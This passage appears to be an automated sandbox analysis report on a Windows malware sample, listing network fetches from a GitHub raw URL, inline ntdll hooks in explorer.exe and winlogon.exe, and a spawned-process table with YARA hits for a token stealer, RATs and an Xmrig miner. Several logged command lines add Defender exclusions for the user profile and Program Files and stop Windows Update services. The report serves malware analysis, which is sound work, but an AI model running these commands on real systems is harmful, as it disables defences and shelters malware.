2024-03-01 14:22:14 UTC	888	IN	HTTP/1.1 200 OK Connection: close Content-Length: 38 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "4f6da874475e426b83a33a7a2607a5ab1b75bd149d959d2ec1fd6ad2989b1d21" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 5DAE:2FAB:22749E:2A3096:65E1E48A Accept-Ranges: bytes Date: Fri, 01 Mar 2024 14:22:14 GMT Via: 1.1 varnish X-Served-By: cache-ewr18139-EWR X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1709302935.812147,VS0,VE1 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: eb8f225b640f46235f598db945fab108a303f55e Expires: Fri, 01 Mar 2024 14:27:14 GMT Source-Age: 13
2024-03-01 14:22:14 UTC	38	IN	Data Raw: 32 2e 38 7c 70 70 36 71 54 75 50 48 37 63 45 4c 7a 4b 71 55 64 6f 48 75 43 66 41 32 32 67 61 4f 42 6d 4c 66 7c 0a Data Ascii: 2.8\|pp6qTuPH7cELzKqUdoHuCfA22gaOBmLf\|

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.4	49749	185.199.111.133	443

Timestamp	Bytes transferred	Direction	Data
2024-03-01 14:22:33 UTC	108	OUT	GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2024-03-01 14:22:33 UTC	889	IN	HTTP/1.1 200 OK Connection: close Content-Length: 38 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "4f6da874475e426b83a33a7a2607a5ab1b75bd149d959d2ec1fd6ad2989b1d21" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: F8B0:587C:209C48:2857AC:65E1E4A9 Accept-Ranges: bytes Date: Fri, 01 Mar 2024 14:22:33 GMT Via: 1.1 varnish X-Served-By: cache-lga21964-LGA X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1709302953.217841,VS0,VE21 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: d8bf97d846bf48232648976c6ac72c52adb0b30a Expires: Fri, 01 Mar 2024 14:27:33 GMT Source-Age: 0
2024-03-01 14:22:33 UTC	38	IN	Data Raw: 32 2e 38 7c 70 70 36 71 54 75 50 48 37 63 45 4c 7a 4b 71 55 64 6f 48 75 43 66 41 32 32 67 61 4f 42 6d 4c 66 7c 0a Data Ascii: 2.8\|pp6qTuPH7cELzKqUdoHuCfA22gaOBmLf\|

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.4	49759	185.199.111.133	443

Timestamp	Bytes transferred	Direction	Data
2024-03-01 14:22:41 UTC	108	OUT	GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2024-03-01 14:22:41 UTC	887	IN	HTTP/1.1 200 OK Connection: close Content-Length: 38 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "4f6da874475e426b83a33a7a2607a5ab1b75bd149d959d2ec1fd6ad2989b1d21" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: F8B0:587C:209C48:2857AC:65E1E4A9 Accept-Ranges: bytes Date: Fri, 01 Mar 2024 14:22:41 GMT Via: 1.1 varnish X-Served-By: cache-lga21949-LGA X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1709302961.244544,VS0,VE1 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 6a6a7e1d32a4d64064259ffc4aed9586d838a5d9 Expires: Fri, 01 Mar 2024 14:27:41 GMT Source-Age: 8
2024-03-01 14:22:41 UTC	38	IN	Data Raw: 32 2e 38 7c 70 70 36 71 54 75 50 48 37 63 45 4c 7a 4b 71 55 64 6f 48 75 43 66 41 32 32 67 61 4f 42 6d 4c 66 7c 0a Data Ascii: 2.8\|pp6qTuPH7cELzKqUdoHuCfA22gaOBmLf\|

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
ZwEnumerateKey	INLINE	explorer.exe, winlogon.exe
NtQuerySystemInformation	INLINE	explorer.exe, winlogon.exe
ZwResumeThread	INLINE	explorer.exe, winlogon.exe
NtDeviceIoControlFile	INLINE	explorer.exe, winlogon.exe
ZwDeviceIoControlFile	INLINE	explorer.exe, winlogon.exe
NtEnumerateKey	INLINE	explorer.exe, winlogon.exe
NtQueryDirectoryFile	INLINE	explorer.exe, winlogon.exe
ZwEnumerateValueKey	INLINE	explorer.exe, winlogon.exe
ZwQuerySystemInformation	INLINE	explorer.exe, winlogon.exe
NtResumeThread	INLINE	explorer.exe, winlogon.exe
RtlGetNativeSystemInformation	INLINE	explorer.exe, winlogon.exe
NtQueryDirectoryFileEx	INLINE	explorer.exe, winlogon.exe
NtEnumerateValueKey	INLINE	explorer.exe, winlogon.exe
ZwQueryDirectoryFileEx	INLINE	explorer.exe, winlogon.exe
ZwQueryDirectoryFile	INLINE	explorer.exe, winlogon.exe

Processes

Process: explorer.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Process: winlogon.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Target ID:	0
Start time:	15:21:54
Start date:	01/03/2024
Path:	C:\Users\user\Desktop\hacn.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\hacn.exe
Imagebase:	0x7ff61d320000
File size:	12'925'322 bytes
MD5 hash:	98AE932A21FEE19C4B51FFA7ABD4CEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	15:21:55
Start date:	01/03/2024
Path:	C:\Users\user\Desktop\hacn.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\hacn.exe
Imagebase:	0x7ff61d320000
File size:	12'925'322 bytes
MD5 hash:	98AE932A21FEE19C4B51FFA7ABD4CEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:21:56
Start date:	01/03/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe -pbeznogym
Imagebase:	0x7ff664270000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:21:56
Start date:	01/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:21:56
Start date:	01/03/2024
Path:	C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe -pbeznogym
Imagebase:	0xe0000
File size:	7'619'102 bytes
MD5 hash:	232B5DBB1510598F8A683DD2752A99C4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: 00000004.00000003.1670923663.0000000006800000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: 00000004.00000003.1670923663.0000000006800000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000003.1670923663.0000000006800000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000003.1670923663.0000000006800000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 21%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:21:57
Start date:	01/03/2024
Path:	C:\ProgramData\main.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\main.exe"
Imagebase:	0x244176d0000
File size:	5'872'343 bytes
MD5 hash:	DE8515E07D1C34FFF3C1DDD4FEE593FB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.1756028190.0000024419A71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\ProgramData\main.exe, Author: Joe Security Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: C:\ProgramData\main.exe, Author: Joe Security Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: C:\ProgramData\main.exe, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\ProgramData\main.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\ProgramData\main.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 66%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	15:21:58
Start date:	01/03/2024
Path:	C:\ProgramData\setup.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\setup.exe"
Imagebase:	0x7ff617a60000
File size:	5'617'152 bytes
MD5 hash:	1274CBCD6329098F79A3BE6D76AB8B97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	15:21:58
Start date:	01/03/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	15:21:58
Start date:	01/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0xfa0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:22:02
Start date:	01/03/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Imagebase:	0x7ff664270000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	15:22:02
Start date:	01/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	15:22:02
Start date:	01/03/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop UsoSvc
Imagebase:	0x7ff77ef20000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	15:22:02
Start date:	01/03/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop WaaSMedicSvc
Imagebase:	0x7ff77ef20000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	15:22:02
Start date:	01/03/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop wuauserv
Imagebase:	0x7ff77ef20000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	15:22:02
Start date:	01/03/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop bits
Imagebase:	0x7ff77ef20000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	15:22:02
Start date:	01/03/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop dosvc
Imagebase:	0x7ff77ef20000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	15:22:02
Start date:	01/03/2024
Path:	C:\Windows\System32\dialer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\dialer.exe
Imagebase:	0x7ff7fb370000
File size:	39'936 bytes
MD5 hash:	B2626BDCF079C6516FC016AC5646DF93
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	15:22:02
Start date:	01/03/2024
Path:	C:\Windows\System32\winlogon.exe
Wow64 process (32bit):	false
Commandline:	winlogon.exe
Imagebase:	0x7ff7cd660000
File size:	906'240 bytes
MD5 hash:	F8B41A1B3E569E7E6F990567F21DCE97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	15:22:03
Start date:	01/03/2024
Path:	C:\Program Files\Google\Chrome\updater.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Google\Chrome\updater.exe
Imagebase:	0x7ff692c20000
File size:	5'617'152 bytes
MD5 hash:	1274CBCD6329098F79A3BE6D76AB8B97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	15:22:03
Start date:	01/03/2024
Path:	C:\Windows\System32\lsass.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\lsass.exe
Imagebase:	0x7ff7a2ae0000
File size:	59'456 bytes
MD5 hash:	A1CC00332BBF370654EE3DC8CDC8C95A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	15:22:03
Start date:	01/03/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 3104, Parent PID: 984

General

Target ID:	28
Start time:	15:22:03
Start date:	01/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	15:22:04
Start date:	01/03/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	15:22:04
Start date:	01/03/2024
Path:	C:\Windows\System32\dwm.exe
Wow64 process (32bit):	false
Commandline:	dwm.exe
Imagebase:	0x7ff74e710000
File size:	94'720 bytes
MD5 hash:	5C27608411832C5B39BA04E33D53536C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	15:22:05
Start date:	01/03/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp1E4E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp1E4E.tmp.bat
Imagebase:	0x7ff664270000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	15:22:05
Start date:	01/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	15:22:05
Start date:	01/03/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	Tasklist /fi "PID eq 7748"
Imagebase:	0x7ff72d3d0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	15:22:05
Start date:	01/03/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find ":"
Imagebase:	0x7ff6d5c20000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	15:22:06
Start date:	01/03/2024
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	Timeout /T 1 /Nobreak
Imagebase:	0x7ff63ae30000
File size:	32'768 bytes
MD5 hash:	100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	15:22:06
Start date:	01/03/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Imagebase:	0x7ff664270000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7948, Parent PID: 7876

General

Target ID:	37
Start time:	15:22:06
Start date:	01/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	15:22:06
Start date:	01/03/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop UsoSvc
Imagebase:	0x7ff77ef20000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	15:22:06
Start date:	01/03/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop WaaSMedicSvc
Imagebase:	0x7ff77ef20000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	15:22:07
Start date:	01/03/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop wuauserv
Imagebase:	0x7ff77ef20000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	15:22:07
Start date:	01/03/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop bits
Imagebase:	0x7ff77ef20000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	15:22:07
Start date:	01/03/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	Tasklist /fi "PID eq 7748"
Imagebase:	0x7ff72d3d0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	15:22:07
Start date:	01/03/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find ":"
Imagebase:	0x7ff6d5c20000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	15:22:07
Start date:	01/03/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop dosvc
Imagebase:	0x7ff77ef20000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	15:22:07
Start date:	01/03/2024
Path:	C:\Windows\System32\dialer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\dialer.exe
Imagebase:	0x7ff7fb370000
File size:	39'936 bytes
MD5 hash:	B2626BDCF079C6516FC016AC5646DF93
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	46
Start time:	15:22:07
Start date:	01/03/2024
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	Timeout /T 1 /Nobreak
Imagebase:	0x7ff63ae30000
File size:	32'768 bytes
MD5 hash:	100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	15:22:08
Start date:	01/03/2024
Path:	C:\Windows\System32\dialer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\dialer.exe
Imagebase:	0x7ff7fb370000
File size:	39'936 bytes
MD5 hash:	B2626BDCF079C6516FC016AC5646DF93
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000031.00000002.2888080335.0000021CC15E7000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000031.00000002.2888080335.0000021CC15E7000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	false

Show Windows behavior

Target ID:	50
Start time:	15:22:08
Start date:	01/03/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	Tasklist /fi "PID eq 7748"
Imagebase:	0x7ff72d3d0000
File size:	106'496 bytes
